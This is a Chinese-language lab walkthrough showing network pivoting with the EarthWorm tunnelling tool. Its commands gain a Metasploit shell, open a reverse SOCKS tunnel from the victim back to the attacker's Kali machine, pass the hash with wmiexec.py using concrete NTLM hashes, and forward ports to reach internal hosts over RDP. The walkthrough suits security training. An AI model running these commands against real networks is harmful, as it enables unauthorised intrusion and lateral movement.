声明:
所有演示都是在靶场环境下完成,仅限于网络安全技术交流,请遵守网络安全法
实际操作视频地址
https://www.bilibili.com/video/BV1SD4y1i7Ku/

靶场说明:
EW二级互联模式如示意图,kali与win7互通,win7和weblogic互通,win7与win2012web和其它内网主机不能直接互访,weblogic与内网其它主机可以互访
整体设置
1.weblogic 10.10.10.12上启动代理服务
weblogic上执行1 # ew_for_Win.exe -s ssocksd -l 1080
2.win7上执行,把来自外部 1090端口的流量转发到weblogic10.10.10.12的1080端口上
# ew_for_Win.exe -s lcx_tran -l 1090 -f 10.10.10.12 -g 1080
3.kali设置proxychains socks192.168.1.4 1090,举例proxychains rdesktop 10.10.10.13
攻击步骤
1.利用msf通过psexec拿下win7 192.168.1.4的shell,上传ew.exe
2.设置反向代理
2.1kali上启动反向代理
./ew_for_linux -s rcsocks -l 1080 -e 1235 &
2.2 win7跳板机上执行反向链接kali的1235端口
meterpreter > execute -f "c:\windows\temp\ew.exe -s rssocks -d 192.168.1.5 -e 1235"
3.正向代理设置完成,设置proxychains工具,利用反向代理渗透weblogic,从win7上拿下hash,利用pth横向移动到weblogic
proxychains python wmiexec.py administrator@10.10.10.12 -hashes 41c3fc4a0f0950659a67bb2340a5f2dd:ccef208c6485269c20db2cad21734fe7 -codec gbk
4.在weblogic上上传ew.exe,并启动ew.exe,建立正向代理,监听1080端口
C:\windows\temp>ew.exe -s ssocksd -l 1080
5.在win7上执行ew命令,进行端口转发,把1090端口的流量转发到10.10.10.12的1080上
meterpreter > execute -f "c:\windows\temp\ew.exe -s lcx_tran -l 1090 -f 10.10.10.12 -g 1080"
6这样,完成一个正向代理,可以把最先建立的反向代理去掉了,可以利用正向代理访问内网资源了。
7.设置代理工具proxychains,代理ip是win7的ip地址192.168.1.4,代理端口是1090
8.远程访问10.10.10.13
proxychains rdesktop 10.10.10.13